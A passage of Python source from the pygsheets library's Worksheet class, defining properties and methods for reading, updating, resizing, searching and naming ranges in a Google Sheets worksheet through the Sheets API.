self.logger = logging.getLogger(__name__)
self.spreadsheet = spreadsheet
self.client = spreadsheet.client
self._linked = True
self.jsonSheet = jsonSheet
self.data_grid = None # for storing sheet data while unlinked
self.grid_update_time = None
def __repr__(self):
return '<%s %s index:%s>' % (self.__class__.__name__,
repr(self.title), self.index)
@property
def id(self):
"""The ID of this worksheet."""
return self.jsonSheet['properties']['sheetId']
@property
def index(self):
"""The index of this worksheet"""
return self.jsonSheet['properties']['index']
@index.setter
def index(self, index):
self.jsonSheet['properties']['index'] = index
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'index')
@property
def title(self):
"""The title of this worksheet."""
return self.jsonSheet['properties']['title']
@title.setter
def title(self, title):
self.jsonSheet['properties']['title'] = title
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'title')
@property
def hidden(self):
"""Mark the worksheet as hidden."""
return self.jsonSheet['properties'].get('hidden', False)
@hidden.setter
def hidden(self, hidden):
self.jsonSheet['properties']['hidden'] = hidden
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'hidden')
@property
def url(self):
"""The url of this worksheet."""
return self.spreadsheet.url+"/edit#gid="+str(self.id)
@property
def rows(self):
"""Number of rows active within the sheet. A new sheet contains 1000 rows."""
return int(self.jsonSheet['properties']['gridProperties']['rowCount'])
@rows.setter
def rows(self, row_count):
if row_count == self.rows:
return
self.jsonSheet['properties']['gridProperties']['rowCount'] = int(row_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/rowCount')
@property
def cols(self):
"""Number of columns active within the sheet."""
return int(self.jsonSheet['properties']['gridProperties']['columnCount'])
@cols.setter
def cols(self, col_count):
if col_count == self.cols:
return
self.jsonSheet['properties']['gridProperties']['columnCount'] = int(col_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/columnCount')
@property
def frozen_rows(self):
"""Number of frozen rows."""
return self.jsonSheet['properties']['gridProperties'].get('frozenRowCount', 0)
@frozen_rows.setter
def frozen_rows(self, row_count):
self.jsonSheet['properties']['gridProperties']['frozenRowCount'] = int(row_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/frozenRowCount')
@property
def frozen_cols(self):
"""Number of frozen columns."""
return self.jsonSheet['properties']['gridProperties'].get('frozenColumnCount', 0)
@frozen_cols.setter
def frozen_cols(self, col_count):
self.jsonSheet['properties']['gridProperties']['frozenColumnCount'] = int(col_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/frozenColumnCount')
@property
def linked(self):
"""If the sheet is linked."""
return self._linked
def refresh(self, update_grid=False):
"""refresh worksheet data"""
jsonsheet = self.client.open_as_json(self.spreadsheet.id)
for sheet in jsonsheet.get('sheets'):
if sheet['properties']['sheetId'] == self.id:
self.jsonSheet = sheet
if update_grid:
self._update_grid()
# @TODO the update is not instantaious
def _update_grid(self, force=False):
"""
update the data grid (offline) with values from sheeet
:param force: force update data grid
"""
if not self.data_grid or force:
self.data_grid = self.get_all_values(returnas='cells', include_tailing_empty=True, include_tailing_empty_rows=True)
elif not force:
updated = datetime.datetime.strptime(self.spreadsheet.updated, '%Y-%m-%dT%H:%M:%S.%fZ')
if updated > self.grid_update_time:
self.data_grid = self.get_all_values(returnas='cells', include_tailing_empty=True, include_tailing_empty_rows=True)
self.grid_update_time = datetime.datetime.utcnow()
def link(self, syncToCloud=True):
""" Link the spreadsheet with cloud, so all local changes
will be updated instantly, so does all data fetches
:param syncToCloud: update the cloud with local changes (data_grid) if set to true
update the local copy with cloud if set to false
"""
self._linked = True
if syncToCloud:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], '*')
else:
wks = self.spreadsheet.worksheet(property='id', value=self.id)
self.jsonSheet = wks.jsonSheet
tmp_data_grid = [item for sublist in self.data_grid for item in sublist] # flatten the list
self.update_cells(tmp_data_grid)
# @TODO
def unlink(self):
""" Unlink the spread sheet with cloud, so all local changes
will be made on local copy fetched
.. warning::
After unlinking update functions will work
"""
self._update_grid()
self._linked = False
def sync(self):
"""
sync the worksheet (datagrid, and worksheet properties) to cloud
"""
self.link(True)
self.logger.warn("sync not implimented")
def _get_range(self, start_label, end_label=None, rformat='A1'):
"""get range in A1 notation, given start and end labels
:param start_label: range start label
:param end_label: range end label
:param rformat: can be A1 or GridRange
"""
if not end_label:
end_label = start_label
if rformat == "A1":
return self.title + '!' + ('%s:%s' % (format_addr(start_label, 'label'),
format_addr(end_label, 'label')))
else:
start_tuple = format_addr(start_label, "tuple")
end_tuple = format_addr(end_label, "tuple")
return {"sheetId": self.id, "startRowIndex": start_tuple[0]-1, "endRowIndex": end_tuple[0],
"startColumnIndex": start_tuple[1]-1, "endColumnIndex": end_tuple[1]}
def cell(self, addr):
"""
Returns cell object at given address.
:param addr: cell address as either tuple (row, col) or cell label 'A1'
:returns: an instance of a :class:`Cell`
Example:
>>> wks.cell((1,1))
<Cell R1C1 "I'm cell A1">
>>> wks.cell('A1')
<Cell R1C1 "I'm cell A1">
"""
if not self._linked: return False
try:
if type(addr) is str:
val = self.client.get_range(self.spreadsheet.id, self._get_range(addr, addr), 'ROWS')[0][0]
elif type(addr) is tuple:
label = format_addr(addr, 'label')
val = self.client.get_range(self.spreadsheet.id, self._get_range(label, label), 'ROWS')[0][0]
else:
raise CellNotFound
except Exception as e:
if str(e).find('exceeds grid limits') != -1:
raise CellNotFound
else:
raise
return Cell(addr, val, self)
def range(self, crange, returnas='cells'):
"""Returns a list of :class:`Cell` objects from specified range.
:param crange: A string with range value in common format,
e.g. 'A1:A5'.
:param returnas: can be 'matrix', 'cell', 'range' the corresponding type will be returned
"""
startcell = crange.split(':')[0]
endcell = crange.split(':')[1]
return self.get_values(startcell, endcell, returnas=returnas, include_tailing_empty_rows=True)
def get_value(self, addr, value_render=ValueRenderOption.FORMATTED_VALUE):
"""
value of a cell at given address
:param addr: cell address as either tuple or label
:param value_render: how the output values should rendered. `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
"""
addr = format_addr(addr, 'tuple')
try:
return self.get_values(addr, addr, returnas='matrix', include_tailing_empty=True,
include_tailing_empty_rows=True, value_render=value_render)[0][0]
except KeyError:
raise CellNotFound
def get_values(self, start, end, returnas='matrix', majdim='ROWS', include_tailing_empty=True,
include_tailing_empty_rows=False, value_render=ValueRenderOption.FORMATTED_VALUE,
date_time_render_option=DateTimeRenderOption.SERIAL_NUMBER, **kwargs):
"""
Returns a range of values from start cell to end cell. It will fetch these values from remote and then
processes them. Will return either a simple list of lists, a list of Cell objects or a DataRange object with
all the cells inside.
:param start: Top left position as tuple or label
:param end: Bottom right position as tuple or label
:param majdim: The major dimension of the matrix. ('ROWS') ( 'COLMUNS' not implemented )
:param returnas: The type to return the fetched values as. ('matrix', 'cell', 'range')
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value in a row
:param include_tailing_empty_rows: whether to include tailing rows with no values; if include_tailing_empty is false,
will return unfilled list for each empty row, else will return rows filled with empty cells
:param value_render: how the output values should rendered. `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
:param date_time_render_option: How dates, times, and durations should be represented in the output.
This is ignored if `valueRenderOption` is `FORMATTED_VALUE`. The default
dateTime render option is [`DateTimeRenderOption.SERIAL_NUMBER`].
:returns: 'range': :class:`DataRange <DataRange>`
'cell': [:class:`Cell <Cell>`]
'matrix': [[ ... ], [ ... ], ...]
"""
include_tailing_empty = kwargs.get('include_empty', include_tailing_empty)
include_tailing_empty_rows = kwargs.get('include_all', include_tailing_empty_rows)
_deprecated_keywords = ['include_empty', 'include_all']
for key in kwargs:
if key in _deprecated_keywords:
warnings.warn(
'The argument {} is deprecated. Use {} instead.'.format(key, _deprecated_keyword_mapping[key])
, category=DeprecationWarning)
kwargs.pop(key, None)
if not self._linked: return False
majdim = majdim.upper()
if majdim.startswith('COL'):
majdim = "COLUMNS"
prev_include_tailing_empty_rows, prev_include_tailing_empty = True, True
# fetch the values
if returnas == 'matrix':
values = self.client.get_range(self.spreadsheet.id, self._get_range(start, end), majdim,
value_render_option=value_render,
date_time_render_option=date_time_render_option, **kwargs)
empty_value = ''
else:
values = self.client.sheet.get(self.spreadsheet.id, fields='sheets/data/rowData',
includeGridData=True,
ranges=self._get_range(start, end))
values = values['sheets'][0]['data'][0].get('rowData', [])
values = [x.get('values', []) for x in values]
empty_value = dict({"effectiveValue": {"stringValue": ""}})
# Cells are always returned in row major form from api. lets keep them such that for now
# So lets first make a complete rectangle and cleanup later
if majdim == "COLUMNS":
prev_include_tailing_empty = include_tailing_empty
prev_include_tailing_empty_rows = include_tailing_empty_rows
include_tailing_empty = True
include_tailing_empty_rows = True
if returnas == 'range': # need perfect rectangle
include_tailing_empty = True
include_tailing_empty_rows = True
if values == [['']] or values == []: values = [[]]
# cleanup and re-structure the values
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
max_rows = end[0] - start[0] + 1
max_cols = end[1] - start[1] + 1
if majdim == "COLUMNS" and returnas == "matrix":
max_cols = end[0] - start[0] + 1
max_rows = end[1] - start[1] + 1
# restructure values according to params
if include_tailing_empty_rows and (max_rows-len(values)) > 0: # append empty rows in end
values.extend([[]]*(max_rows-len(values)))
if include_tailing_empty: # append tailing cells in rows
values = [list(x + [empty_value] * (max_cols - len(x))) for x in values]
elif returnas != 'matrix':
for i, row in enumerate(values):
for j, cell in reversed(list(enumerate(row))):
if 'effectiveValue' not in cell:
del values[i][j]
else:
break
if values == [[]] or values == [['']]: return values
if returnas == 'matrix':
return values
else:
# Now the cells are complete rectangle, convert to columen major form and remove
# the excess cells based on the params saved
if majdim == "COLUMNS":
values = list(map(list, zip(*values)))
for i in range(len(values) - 1, -1, -1):
if not prev_include_tailing_empty_rows:
if not any((item.get("effectiveValue", {}).get("stringValue", "-1") != "" and "effectiveValue" in item) for item in values[i]):
del values[i]
continue
if not prev_include_tailing_empty:
for k in range(len(values[i])-1, -1, -1):
if values[i][k].get("effectiveValue", {}).get("stringValue", "-1") != "" and "effectiveValue" in values[i][k]:
break
else:
del values[i][k]
max_cols = end[0] - start[0] + 1
max_rows = end[1] - start[1] + 1
cells = []
for k in range(len(values)):
cells.extend([[]])
for i in range(len(values[k])):
if majdim == "ROWS":
cells[-1].append(Cell(pos=(start[0]+k, start[1]+i), worksheet=self, cell_data=values[k][i]))
else:
cells[-1].append(Cell(pos=(start[0]+i, start[1]+k), worksheet=self, cell_data=values[k][i]))
if cells == []: cells = [[]]
if returnas.startswith('cell'):
return cells
elif returnas == 'range':
return DataRange(start, format_addr(end, 'label'), worksheet=self, data=cells)
def get_all_values(self, returnas='matrix', majdim='ROWS', include_tailing_empty=True,
include_tailing_empty_rows=True, **kwargs):
"""Returns a list of lists containing all cells' values as strings.
:param majdim: output as row wise or columwise
:param returnas: return as list of strings of cell objects
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param include_tailing_empty_rows: whether to include rows with no values; if include_tailing_empty is false,
will return unfilled list for each empty row, else will return rows filled with empty string
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:type returnas: 'matrix','cell', 'range
Example:
>>> wks.get_all_values()
[[u'another look.', u'', u'est'],
[u'EE 4212', u"it's down there "],
[u'ee 4210', u'somewhere, let me take ']]
"""
return self.get_values((1, 1), (self.rows, self.cols), returnas=returnas, majdim=majdim,
include_tailing_empty=include_tailing_empty,
include_tailing_empty_rows=include_tailing_empty_rows, **kwargs)
def get_all_records(self, empty_value='', head=1, majdim='ROWS', numericise_data=True, **kwargs):
"""
Returns a list of dictionaries, all of them having
- the contents of the spreadsheet's with the head row as keys, \
And each of these dictionaries holding
- the contents of subsequent rows of cells as values.
Cell values are numericised (strings that can be read as ints
or floats are converted).
:param empty_value: determines empty cell's value
:param head: determines wich row to use as keys, starting from 1
following the numeration of the spreadsheet.
:param majdim: ROW or COLUMN major form
:param numericise_data: determines if data is converted to numbers or left as string
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:returns: a list of dict with header column values as head and rows as list
.. warning::
Will work nicely only if there is a single table in the sheet
"""
if not self._linked: return False
idx = head - 1
data = self.get_all_values(returnas='matrix', include_tailing_empty=False, include_tailing_empty_rows=False,
majdim=majdim, **kwargs)
keys = data[idx]
num_keys = len(keys)
values = []
for row in data[idx+1:]:
if len(row) < num_keys:
row.extend([""]*(num_keys-len(row)))
elif len(row) > num_keys:
row = row[:num_keys]
if numericise_data:
values.append(numericise_all(row, empty_value))
else:
values.append(row)
return [dict(zip(keys, row)) for row in values]
def get_row(self, row, returnas='matrix', include_tailing_empty=True, **kwargs):
"""Returns a list of all values in a `row`.
Empty cells in this list will be rendered as empty strings .
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param row: index of row
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:param returnas: ('matrix', 'cell', 'range') return as cell objects or just 2d array or range object
"""
return self.get_values((row, 1), (row, self.cols), returnas=returnas,
include_tailing_empty=include_tailing_empty, include_tailing_empty_rows=True, **kwargs)[0]
def get_col(self, col, returnas='matrix', include_tailing_empty=True, **kwargs):
"""Returns a list of all values in column `col`.
Empty cells in this list will be rendered as :const:` ` .
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param col: index of col
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:param returnas: ('matrix' or 'cell' or 'range') return as cell objects or just values
"""
return self.get_values((1, col), (self.rows, col), returnas=returnas, majdim='COLUMNS',
include_tailing_empty=include_tailing_empty, include_tailing_empty_rows=True, **kwargs)[0]
def get_gridrange(self, start, end):
"""
get a range in gridrange format
:param start: start address
:param end: end address
"""
return self._get_range(start, end, "gridrange")
def update_cell(self, **kwargs):
warnings.warn(_warning_mesage.format("method", "update_value"), category=DeprecationWarning)
self.update_value(**kwargs)
def update_value(self, addr, val, parse=None):
"""Sets the new value to a cell.
:param addr: cell address as tuple (row,column) or label 'A1'.
:param val: New value
:param parse: if False, values will be stored \
as is else as if the user typed them into the UI default is spreadsheet.default_parse
Example:
>>> wks.update_value('A1', '42') # this could be 'a1' as well
<Cell R1C1 "42">
>>> wks.update_value('A3', '=A1+A2', True)
<Cell R1C3 "57">
"""
if not self._linked: return False
label = format_addr(addr, 'label')
body = dict()
body['range'] = self._get_range(label, label)
body['majorDimension'] = 'ROWS'
body['values'] = [[val]]
parse = parse if parse is not None else self.spreadsheet.default_parse
self.client.sheet.values_batch_update(self.spreadsheet.id, body, parse)
def update_values(self, crange=None, values=None, cell_list=None, extend=False, majordim='ROWS', parse=None):
"""Updates cell values in batch, it can take either a cell list or a range and values. cell list is only efficient
for small lists. This will only update the cell values not other properties.
:param cell_list: List of a :class:`Cell` objects to update with their values. If you pass a matrix to this,\
then it is assumed that the matrix is continous (range), and will just update values based on label of top \
left and bottom right cells.
:param crange: range in format A1:A2 or just 'A1' or even (1,2) end cell will be inferred from values
:param values: matrix of values if range given, if a value is None its unchanged
:param extend: add columns and rows to the workspace if needed (not for cell list)
:param majordim: major dimension of given data
:param parse: if the values should be as if the user typed them into the UI else its stored as is. Default is
spreadsheet.default_parse
"""
if not self._linked: return False
if cell_list:
if type(cell_list[0]) is list:
values = []
for row in cell_list:
tmp_row = []
for col in cell_list:
tmp_row.append(cell_list[row][col].value)
values.append(tmp_row)
crange = cell_list[0][0].label + ':' + cell_list[-1][-1].label
else:
values = [[None for x in range(self.cols)] for y in range(self.rows)]
min_tuple = [cell_list[0].row, cell_list[0].col]
max_tuple = [0, 0]
for cell in cell_list:
min_tuple[0] = min(min_tuple[0], cell.row)
min_tuple[1] = min(min_tuple[1], cell.col)
max_tuple[0] = max(max_tuple[0], cell.row)
max_tuple[1] = max(max_tuple[1], cell.col)
try:
values[cell.row-1][cell.col-1] = cell.value
except IndexError:
raise CellNotFound(cell)
values = [row[min_tuple[1]-1:max_tuple[1]] for row in values[min_tuple[0]-1:max_tuple[0]]]
crange = str(format_addr(tuple(min_tuple))) + ':' + str(format_addr(tuple(max_tuple)))
elif crange and values:
if not isinstance(values, list) or not isinstance(values[0], list):
raise InvalidArgumentValue("values should be a matrix")
else:
raise InvalidArgumentValue("provide either cells or values, not both")
body = dict()
estimate_size = False
if type(crange) == str:
if crange.find(':') == -1:
estimate_size = True
elif type(crange) == tuple:
estimate_size = True
else:
raise InvalidArgumentValue('crange')
if estimate_size:
start_r_tuple = format_addr(crange, output='tuple')
max_2nd_dim = max(map(len, values))
if majordim == 'ROWS':
end_r_tuple = (start_r_tuple[0]+len(values), start_r_tuple[1]+max_2nd_dim)
else:
end_r_tuple = (start_r_tuple[0] + max_2nd_dim, start_r_tuple[1] + len(values))
body['range'] = self._get_range(crange, format_addr(end_r_tuple))
else:
body['range'] = self._get_range(*crange.split(':'))
if extend:
self.refresh()
end_r_tuple = format_addr(str(body['range']).split(':')[-1])
if self.rows < end_r_tuple[0]:
self.rows = end_r_tuple[0]-1
if self.cols < end_r_tuple[1]:
self.cols = end_r_tuple[1]-1
body['majorDimension'] = majordim
body['values'] = values
parse = parse if parse is not None else self.spreadsheet.default_parse
self.client.sheet.values_batch_update(self.spreadsheet.id, body, parse)
def update_cells_prop(self, **kwargs):
warnings.warn(_warning_mesage.format('method', 'update_cells'), category=DeprecationWarning)
self.update_cells(**kwargs)
def update_cells(self, cell_list, fields='*'):
"""
update cell properties and data from a list of cell objects
:param cell_list: list of cell objects
:param fields: cell fields to update, in google `FieldMask format <https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#google.protobuf.FieldMask>`_
"""
if not self._linked: return False
if fields == 'userEnteredValue':
pass # TODO Create a grid and put values there and update
requests = []
for cell in cell_list:
request = cell.update(get_request=True, worksheet_id=self.id)
request['repeatCell']['fields'] = fields
requests.append(request)
self.client.sheet.batch_update(self.spreadsheet.id, requests)
def update_col(self, index, values, row_offset=0):
"""
update an existing colum with values
:param index: index of the starting column form where value should be inserted
:param values: values to be inserted as matrix, column major
:param row_offset: rows to skip before inserting values
"""
if not self._linked: return False
if type(values[0]) is not list:
values = [values]
colrange = format_addr((row_offset+1, index), 'label') + ":" + format_addr((row_offset+len(values[0]),
index+len(values)-1), "label")
self.update_values(crange=colrange, values=values, majordim='COLUMNS')
def update_row(self, index, values, col_offset=0):
"""Update an existing row with values
:param index: Index of the starting row form where value should be inserted
:param values: Values to be inserted as matrix
:param col_offset: Columns to skip before inserting values
"""
if not self._linked: return False
if type(values[0]) is not list:
values = [values]
colrange = format_addr((index, col_offset+1), 'label') + ':' + format_addr((index+len(values)-1,
col_offset+len(values[0])), 'label')
self.update_values(crange=colrange, values=values, majordim='ROWS')
def resize(self, rows=None, cols=None):
"""Resizes the worksheet.
:param rows: New number of rows.
:param cols: New number of columns.
"""
trows, tcols = self.rows, self.cols
try:
self.rows, self.cols = rows, cols
except:
self.logger.error("couldnt resize the sheet to " + str(rows) + ',' + str(cols))
self.rows, self.cols = trows, tcols
def add_rows(self, rows):
"""Adds new rows to this worksheet.
:param rows: How many rows to add (integer)
"""
self.resize(rows=self.rows + rows, cols=self.cols)
def add_cols(self, cols):
"""Add new columns to this worksheet.
:param cols: How many columns to add (integer)
"""
self.resize(cols=self.cols + cols, rows=self.rows)
def delete_cols(self, index, number=1):
"""Delete 'number' of columns from index.
:param index: Index of first column to delete
:param number: Number of columns to delete
"""
if not self._linked: return False
index -= 1
if number < 1:
raise InvalidArgumentValue('number')
request = {'deleteDimension': {'range': {'sheetId': self.id, 'dimension': 'COLUMNS',
'endIndex': (index+number), 'startIndex': index}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['columnCount'] = self.cols-number
def delete_rows(self, index, number=1):
"""Delete 'number' of rows from index.
:param index: Index of first row to delete
:param number: Number of rows to delete
"""
if not self._linked: return False
index -= 1
if number < 1:
raise InvalidArgumentValue
request = {'deleteDimension': {'range': {'sheetId': self.id, 'dimension': 'ROWS',
'endIndex': (index+number), 'startIndex': index}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['rowCount'] = self.rows-number
def insert_cols(self, col, number=1, values=None, inherit=False):
"""Insert new columns after 'col' and initialize all cells with values. Increases the
number of rows if there are more values in values than rows.
Reference: `insert request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets/request#insertdimensionrequest>`_
:param col: Index of the col at which the values will be inserted.
:param number: Number of columns to be inserted.
:param values: Content to be inserted into new columns.
:param inherit: New cells will inherit properties from the column to the left (True) or to the right (False).
"""
if not self._linked: return False
request = {'insertDimension': {'inheritFromBefore': inherit,
'range': {'sheetId': self.id, 'dimension': 'COLUMNS',
'endIndex': (col+number), 'startIndex': col}
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['columnCount'] = self.cols+number
if values:
self.update_col(col+1, values)
def insert_rows(self, row, number=1, values=None, inherit=False):
"""Insert a new row after 'row' and initialize all cells with values.
Widens the worksheet if there are more values than columns.
Reference: `insert request`_
:param row: Index of the row at which the values will be inserted.
:param number: Number of rows to be inserted.
:param values: Content to be inserted into new rows.
:param inherit: New cells will inherit properties from the row above (True) or below (False).
"""
if not self._linked: return False
request = {'insertDimension': {'inheritFromBefore': inherit,
'range': {'sheetId': self.id, 'dimension': 'ROWS',
'endIndex': (row+number), 'startIndex': row}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['rowCount'] = self.rows + number
if values:
self.update_row(row+1, values)
def clear(self, start='A1', end=None, fields="userEnteredValue"):
"""Clear all values in worksheet. Can be limited to a specific range with start & end.
Fields specifies which cell properties should be cleared. Use "*" to clear all fields.
Reference:
- `CellData Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#CellData>`_
- `FieldMask Api object <https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#google.protobuf.FieldMask>`_
:param start: Top left cell label.
:param end: Bottom right cell label.
:param fields: Comma separated list of field masks.
"""
if not self._linked: return False
if not end:
end = (self.rows, self.cols)
request = {"updateCells": {"range": self._get_range(start, end, "GridRange"), "fields": fields}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def adjust_column_width(self, start, end=None, pixel_size=100):
"""Set the width of one or more columns.
:param start: Index of the first column to be widened.
:param end: Index of the last column to be widened.
:param pixel_size: New width in pixels.
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": "COLUMNS",
"startIndex": start,
"endIndex": end
},
"properties": {
"pixelSize": pixel_size
},
"fields": "pixelSize"
}
},
self.client.sheet.batch_update(self.spreadsheet.id, request)
def update_dimensions_visibility(self, start, end=None, dimension="ROWS", hidden=True):
"""Hide or show one or more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the last row or column.
:param dimension: 'ROWS' or 'COLUMNS'
:param hidden: Hide rows or columns
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": dimension,
"startIndex": start,
"endIndex": end
},
"properties": {
"hiddenByUser": hidden
},
"fields": "hiddenByUser"
}
},
self.client.sheet.batch_update(self.spreadsheet.id, request)
def hide_dimensions(self, start, end=None, dimension="ROWS"):
"""Hide one ore more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the first row or column.
:param dimension: 'ROWS' or 'COLUMNS'
"""
self.update_dimensions_visibility(start, end, dimension, hidden=True)
def show_dimensions(self, start, end=None, dimension="ROWS"):
"""Show one ore more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the first row or column.
:param dimension: 'ROWS' or 'COLUMNS'
"""
self.update_dimensions_visibility(start, end, dimension, hidden=False)
def adjust_row_height(self, start, end=None, pixel_size=100):
"""Adjust the height of one or more rows.
:param start: Index of first row to be heightened.
:param end: Index of last row to be heightened.
:param pixel_size: New height in pixels.
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": "ROWS",
"startIndex": start,
"endIndex": end
},
"properties": {
"pixelSize": pixel_size
},
"fields": "pixelSize"
}
}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def append_table(self, values, start='A1', end=None, dimension='ROWS', overwrite=False, **kwargs):
"""Append a row or column of values.
This will append the list of provided values to the
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/append>`_
:param values: List of values for the new row or column.
:param start: Top left cell of the range (requires a label).
:param end: Bottom right cell of the range (requires a label).
:param dimension: Dimension to which the values will be added ('ROWS' or 'COLUMNS')
:param overwrite: If true will overwrite data present in the spreadsheet. Otherwise will create new
rows to insert the data into.
"""
if not self._linked:
return False
if type(values[0]) != list:
values = [values]
if not end:
end = (self.rows, self.cols)
self.client.sheet.values_append(self.spreadsheet.id, values, dimension, range=self._get_range(start, end),
insertDataOption='OVERWRITE' if overwrite else 'INSERT_ROWS', **kwargs)
self.refresh(False)
def replace(self, pattern, replacement=None, **kwargs):
"""Replace values in any cells matched by pattern in this worksheet. Keyword arguments
not specified will use the default value.
If the worksheet is
- **Unlinked** : Uses `self.find(pattern, **kwargs)` to find the cells and then replace the values in each cell.
- **Linked** : The replacement will be done by a findReplaceRequest as defined by the Google Sheets API.\
After the request the local copy is updated.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets/request#findreplacerequest>`__
:param pattern: Match cell values.
:param replacement: Value used as replacement.
:arg searchByRegex: Consider pattern a regex pattern. (default False)
:arg matchCase: Match case sensitive. (default False)
:arg matchEntireCell: Only match on full match. (default False)
:arg includeFormulas: Match fields with formulas too. (default False)
"""
if self._linked:
find_replace = dict()
find_replace['find'] = pattern
find_replace['replacement'] = replacement
for key in kwargs:
find_replace[key] = kwargs[key]
find_replace['sheetId'] = self.id
body = {'findReplace': find_replace}
self.client.sheet.batch_update(self.spreadsheet.id, body)
# self._update_grid(True)
else:
found_cells = self.find(pattern, **kwargs)
if replacement is None:
replacement = ''
for cell in found_cells:
if 'matchEntireCell' in kwargs and kwargs['matchEntireCell']:
cell.value = replacement
else:
cell.value = re.sub(pattern, replacement, cell.value)
def find(self, pattern, searchByRegex=False, matchCase=False, matchEntireCell=False, includeFormulas=False):
"""Finds all cells matched by the pattern.
Compare each cell within this sheet with pattern and return all matched cells. All cells are compared
as strings. If replacement is set, the value in each cell is set to this value. Unless full_match is False in
in which case only the matched part is replaced.
.. note::
- Formulas are searched as their calculated values and not the actual formula.
- Find fetches all data and then run a linear search on then, so this will be slow if you have a large sheet
:param pattern: A string pattern.
:param searchByRegex: Compile pattern as regex. (default False)
:param matchCase: Comparison is case sensitive. (default False)
:param matchEntireCell: Only match a cell if the pattern matches the entire value. (default False)
:param includeFormulas: Match cells with formulas. (default False)
:returns: A list of :class:`Cells <Cell>`.
"""
if self._linked:
self._update_grid(True)
# flatten data grid.
found_cells = [item for sublist in self.data_grid for item in sublist]
if not includeFormulas:
found_cells = filter(lambda x: x.formula == '', found_cells)
if not matchCase:
pattern = pattern.lower()
if searchByRegex and matchEntireCell and matchCase:
return list(filter(lambda x: fullmatch(pattern, x.value), found_cells))
elif searchByRegex and matchEntireCell and not matchCase:
return list(filter(lambda x: fullmatch(pattern.lower(), x.value.lower()), found_cells))
elif searchByRegex and not matchEntireCell and matchCase:
return list(filter(lambda x: re.search(pattern, x.value), found_cells))
elif searchByRegex and not matchEntireCell and not matchCase:
return list(filter(lambda x: re.search(pattern, x.value.lower()), found_cells))
elif not searchByRegex and matchEntireCell and matchCase:
return list(filter(lambda x: x.value == pattern, found_cells))
elif not searchByRegex and matchEntireCell and not matchCase:
return list(filter(lambda x: x.value.lower() == pattern, found_cells))
elif not searchByRegex and not matchEntireCell and matchCase:
return list(filter(lambda x: False if x.value.find(pattern) == -1 else True, found_cells))
else: # if not searchByRegex and not matchEntireCell and not matchCase
return list(filter(lambda x: False if x.value.lower().find(pattern) == -1 else True, found_cells))
# @TODO optimize with unlink
def create_named_range(self, name, start, end, returnas='range'):
"""Create a new named range in this worksheet.
Reference: `Named range Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#namedrange>`_
:param name: Name of the range.
:param start: Top left cell address (label or coordinates)
:param end: Bottom right cell address (label or coordinates)
:returns: :class:`DataRange`
"""
if not self._linked: return False
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
request = {"addNamedRange": {
"namedRange": {
"name": name,
"range": {
"sheetId": self.id,
"startRowIndex": start[0]-1,
"endRowIndex": end[0],
"startColumnIndex": start[1]-1,
"endColumnIndex": end[1],
}
}}}
res = self.client.sheet.batch_update(self.spreadsheet.id, request)['replies'][0]['addNamedRange']['namedRange']
if returnas == 'json':
return res
else:
return DataRange(worksheet=self, namedjson=res)
def get_named_range(self, name):
"""Get a named range by name.
Reference: `Named range Api object`_
:param name: Name of the named range to be retrieved.
:returns: :class:`DataRange`
:raises RangeNotFound: if no range matched the name given.
"""
if not self._linked: return False
nrange = [x for x in self.spreadsheet.named_ranges if x.name == name and x.worksheet.id == self.id]
if len(nrange) == 0:
self.spreadsheet.update_properties()
nrange = [x for x in self.spreadsheet.named_ranges if x.name == name and x.worksheet.id == self.id]
if len(nrange) == 0:
raise RangeNotFound(name)
return nrange[0]
def get_named_ranges(self, name=''):
"""Get named ranges from this worksheet.
Reference: `Named range Api object`_
:param name: Name of the named range to be retrieved, if omitted all ranges are retrieved.
